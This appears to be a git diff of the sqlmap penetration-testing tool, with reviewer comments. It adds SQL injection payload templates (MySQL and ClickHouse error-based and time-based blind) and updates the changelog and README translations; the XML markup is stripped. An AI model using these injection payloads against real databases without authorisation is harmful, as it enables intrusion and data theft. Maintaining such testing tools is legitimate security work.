+ + MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 7 + 1 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 2 @@ -838,7 +858,7 @@ IBM DB2 OR error-based - WHERE or HAVING clause 2 4 - 1 + 3 1 1 OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -853,6 +873,44 @@ + + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ diff --git a/data/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml index b7df99fdaec..b431bb7849f 100644 --- a/data/xml/payloads/stacked_queries.xml +++ b/data/xml/payloads/stacked_queries.xml @@ -85,7 +85,7 @@ - MySQL < 5.0.12 stacked queries (heavy query - comment) + MySQL < 5.0.12 stacked queries (BENCHMARK - comment) 4 3 2 @@ -105,7 +105,7 @@ - MySQL < 5.0.12 stacked queries (heavy query) + MySQL < 5.0.12 stacked queries (BENCHMARK) 4 5 2 @@ -486,7 +486,7 @@ IBM DB2 stacked queries (heavy query - comment) - 5 + 4 3 2 1-8 @@ -506,7 +506,7 @@ IBM DB2 stacked queries (heavy query) - 5 + 4 5 2 1-8 @@ -607,7 +607,7 @@ SAP MaxDB stacked queries (heavy query - comment) - 5 + 4 4 2 1-8 @@ -627,7 +627,7 @@ SAP MaxDB stacked queries (heavy query) - 5 + 4 5 2 1-8 diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index 033d9fd37fc..21a50ce4016 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -169,7 +169,7 @@ - MySQL < 5.0.12 AND time-based blind (heavy query) + MySQL < 5.0.12 AND time-based blind (BENCHMARK) 5 2 2 @@ -189,7 +189,27 @@ - MySQL < 5.0.12 OR time-based blind (heavy query) + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK) 5 2 3 @@ -209,7 +229,27 @@ - MySQL < 5.0.12 AND time-based blind (heavy query - comment) + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
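Review bot: The new heavy-query tests are labelled `MySQL > 5.0.12` in both the title and the trailing version line, while their renamed BENCHMARK siblings are `< 5.0.12`, so version 5.0.12 itself is claimed by neither set. Elsewhere in this file the boundary is written `>= 5.0.12` (the RLIKE time-based test, for example), so I would write `MySQL >= 5.0.12 AND time-based blind (heavy query)` and `>= 5.0.12` here unless the exclusion is deliberate, in which case a short XML comment saying why would help. The same label is added in the hunks at -209, -230, -250 and -1519. Element names are not visible on this page, so which line is the version field is inferred from position.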
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) 5 5 2 @@ -230,7 +270,28 @@ - MySQL < 5.0.12 OR time-based blind (heavy query - comment) + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) 5 5 3 @@ -250,6 +311,27 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL >= 5.0.12 RLIKE time-based blind 5 @@ -1412,6 +1494,44 @@ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + ClickHouse OR time-based blind (heavy query) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ @@ -1500,7 +1620,7 @@
- MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries) + MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) 5 4 2 @@ -1519,6 +1639,26 @@ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 3 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL time-based blind - Parameter replace (bool) 5 @@ -1778,7 +1918,7 @@ 4 2 1,2,3,9 - 1 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) @@ -1798,7 +1938,7 @@ 5 2 1,2,3,9 - 1 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) @@ -1854,7 +1994,7 @@ - MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query) + MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) 5 4 2 diff --git a/data/xml/queries.xml b/data/xml/queries.xml index 75f6edf9536..37a4b0c2a6e 100644 --- a/data/xml/queries.xml +++ b/data/xml/queries.xml @@ -207,7 +207,7 @@ - + @@ -228,7 +228,7 @@ - + @@ -261,11 +261,11 @@ - + - + - + - + - + - + - + @@ -302,7 +302,7 @@ - + @@ -357,8 +357,8 @@ - - + + @@ -606,7 +606,7 @@ - + @@ -621,7 +621,7 @@ - + @@ -631,24 +631,24 @@ - + - + - + - + @@ -656,7 +656,7 @@ - + @@ -679,8 +679,8 @@ - - + + @@ -747,10 +747,10 @@ - - - - + + + + @@ -770,7 +770,7 @@ - + @@ -778,11 +778,11 @@ - + - + @@ -875,8 +875,8 @@ - - + + @@ -938,10 +938,10 @@ - - - - + + + + @@ -962,11 +962,11 @@ - + - + @@ -975,11 +975,11 @@ - + - + @@ -1319,6 +1319,75 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index a44672e0105..5eab5958460 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md 
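Review bot: The added parameter-replace test is titled `(heavy query - comment)`, but no trailing comment value is visible in its body, whereas the AND and OR `heavy query - comment` tests added earlier in this file do show `#`. If the entry really has no comment, the title should be `MySQL > 5.0.12 time-based blind - Parameter replace (heavy query)`, in line with the neighbouring `Parameter replace (BENCHMARK)` entry. Markup is stripped on this page, so this needs checking against the file itself.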
@@ -1,3 +1,28 @@ +# Version 1.9 (2025-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1) + +# Version 1.8 (2024-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1) + +# Version 1.7 (2023-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1) + +# Version 1.6 (2022-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1) + +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + # Version 1.4 (2020-01-01) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) diff --git a/doc/THANKS.md b/doc/THANKS.md index dc49071a915..3d5e9ec7e75 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -109,6 +109,9 @@ Alessandro Curio, Alessio Dalla Piazza, * for reporting a couple of bugs +Alexis Danizan, +* for contributing support for ClickHouse + Sherif El-Deeb, * for reporting a minor bug diff --git a/doc/translations/README-ar-AR.md b/doc/translations/README-ar-AR.md new file mode 100644 index 00000000000..53b62f51d8c --- /dev/null +++ b/doc/translations/README-ar-AR.md 
@@ -0,0 +1,68 @@
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
+
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
+
+
+
+برنامج sqlmap هو أداة اختبار اختراق مفتوحة المصدر تقوم بأتمتة عملية اكتشاف واستغلال ثغرات حقن SQL والسيطرة على خوادم قواعد البيانات. يأتي مع محرك كشف قوي، والعديد من الميزات المتخصصة لمختبر الاختراق المحترف، ومجموعة واسعة من الخيارات بما في ذلك تحديد بصمة قاعدة البيانات، واستخراج البيانات من قاعدة البيانات، والوصول إلى نظام الملفات الأساسي، وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق.
+
+لقطات الشاشة
+----
+
+
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+
+
+يمكنك زيارة [مجموعة لقطات الشاشة](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) التي توضح بعض الميزات في الويكي.
+
+التثبيت
+----
+
+يمكنك تحميل أحدث إصدار tarball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/tarball/master) أو أحدث إصدار zipball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+يفضل تحميل sqlmap عن طريق استنساخ مستودع [Git](https://github.com/sqlmapproject/sqlmap):
+
+
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+
+
+يعمل sqlmap مباشرة مع [Python](https://www.python.org/download/) إصدار **2.6** و **2.7** و **3.x** على أي نظام تشغيل.
+
+الاستخدام
+----
+
+للحصول على قائمة بالخيارات والمفاتيح الأساسية استخدم:
+
+
+
+ python sqlmap.py -h
+
+
+
+للحصول على قائمة بجميع الخيارات والمفاتيح استخدم:
+
+
+
+ python sqlmap.py -hh
+
+
+
+يمكنك العثور على مثال للتشغيل [هنا](https://asciinema.org/a/46601).
+للحصول على نظرة عامة على إمكانيات sqlmap، وقائمة الميزات المدعومة، ووصف لجميع الخيارات والمفاتيح، مع الأمثلة، ننصحك بمراجعة [دليل المستخدم](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+الروابط
+----
+
+* الصفحة الرئيسية: https://sqlmap.org
+* التحميل: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) أو [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* تغذية التحديثات RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* تتبع المشكلات: https://github.com/sqlmapproject/sqlmap/issues
+* دليل المستخدم: https://github.com/sqlmapproject/sqlmap/wiki
+* الأسئلة الشائعة: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* تويتر: [@sqlmap](https://x.com/sqlmap)
+* العروض التوضيحية: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* لقطات الشاشة: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
\ No newline at end of file
diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md
index 18a3a67baa9..af3de550924 100644
--- a/doc/translations/README-bg-BG.md
+++ b/doc/translations/README-bg-BG.md
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система. 
@@ -20,7 +20,7 @@ sqlmap e инструмент за тестване и проникване, с git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. +sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. Използване ---- @@ -45,6 +45,6 @@ sqlmap работи самостоятелно с [Python](http://www.python.org * Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues * Упътване: https://github.com/sqlmapproject/sqlmap/wiki * Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ckb-KU.md b/doc/translations/README-ckb-KU.md new file mode 100644 index 00000000000..6bb8fca22bc --- /dev/null +++ b/doc/translations/README-ckb-KU.md @@ -0,0 +1,67 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + + +
+
+
+
+بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە کە بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە کە کێشەی ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها کۆمەڵێک سکریپتی بەرفراوانی هەیە کە ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن لەگەڵ بنکەدراوە. لە کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم و جێبەجێکردنی فەرمانەکان لە ڕێگەی پەیوەندی Out Of Band لە سیستەمی کارگێڕدا.
+
+
+سکرین شاتی ئامرازەکە
+----
+
+
+
+
+
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+
+
+
+بۆ بینینی [کۆمەڵێک سکرین شات و سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت.
+
+
+دامەزراندن
+----
+
+بۆ دابەزاندنی نوێترین وەشانی tarball، کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت.
+
+باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap):
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap لە دەرەوەی سندوق کاردەکات لەگەڵ [Python](https://www.python.org/download/) وەشانی **2.6**، **2.7** و **3.x** لەسەر هەر پلاتفۆرمێک.
+
+چۆنیەتی بەکارهێنان
+----
+
+بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان و سویچەکان ئەمانە بەکاربهێنە:
+
+ python sqlmap.py -h
+
+بۆ بەدەستهێنانی لیستی هەموو بژاردە و سویچەکان ئەمە بەکار بێنا:
+
+ python sqlmap.py -hh
+
+دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601).
+بۆ بەدەستهێنانی تێڕوانینێکی گشتی لە تواناکانی sqlmap، لیستی تایبەتمەندییە پشتگیریکراوەکان، و وەسفکردنی هەموو هەڵبژاردن و سویچەکان، لەگەڵ نموونەکان، ئامۆژگاریت دەکرێت کە ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+ +بەستەرەکان +---- + +* ماڵپەڕی سەرەکی: https://sqlmap.org +* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* فیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues +* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki +* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* وێنەی شاشە: https://github.com/sqlmapproject/sqlmap/wiki/وێنەی شاشە + +وەرگێڕانەکان diff --git a/doc/translations/README-de-GER.md b/doc/translations/README-de-DE.md similarity index 69% rename from doc/translations/README-de-GER.md rename to doc/translations/README-de-DE.md index 9067cf6e8fe..379a0575c52 100644 --- a/doc/translations/README-de-GER.md +++ b/doc/translations/README-de-DE.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen. 
@@ -20,7 +20,7 @@ Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.c git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funktioniert sofort mit den [Python](http://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. Benutzung --- @@ -44,6 +44,6 @@ Links * Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues * Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki * Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrationen: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md index 4cc33684fb3..4432ae85835 100644 --- a/doc/translations/README-es-MX.md +++ b/doc/translations/README-es-MX.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. 
Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". @@ -19,7 +19,7 @@ Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https:/ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. Uso --- @@ -44,6 +44,6 @@ Enlaces * Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues * Manual de usuario: 